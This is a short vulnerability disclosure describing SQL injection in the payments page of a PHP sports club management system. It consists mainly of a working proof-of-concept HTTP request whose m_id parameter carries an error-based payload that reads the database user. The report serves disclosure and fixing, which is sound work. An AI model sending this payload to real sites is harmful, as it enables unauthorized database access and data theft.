SQL injection vulnerability in Sports Club Management System

[huclilu]

Build environment: Aapche2.4.39; MySQL5.5.29； PHP5.6.9

SQL injection vulnerability in Sports Club Management System

In admin/make_ Payments.php, at line 119, the information entered by the user is submitted to submit_ Payments.php, follow up the code, and we can see that the m entered by the user_ The ID is assigned to $memID. Without any filtering, it is directly inserted into the database for query, and the query results are returned, causing SQL injection vulnerabilities

• Manual verification

POC：

POST /dashboard/admin/submit_payments.php HTTP/1.1
Host: sportsvul.test
Content-Length: 213
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sportsvul.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sportsvul.test/dashboard/admin/make_payments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ogqe8040ok4a08i16t97ng7734
Connection: close

m_id=1529336794' and (select 2*(if((select * from (select concat((select user())))s), 8446744073709551610, 8446744073709551610)))-- &u_name=Christiana+Mayberry&prevPlan=Football+Plan&plan=BOQKJB&submit=ADD+PAYMENT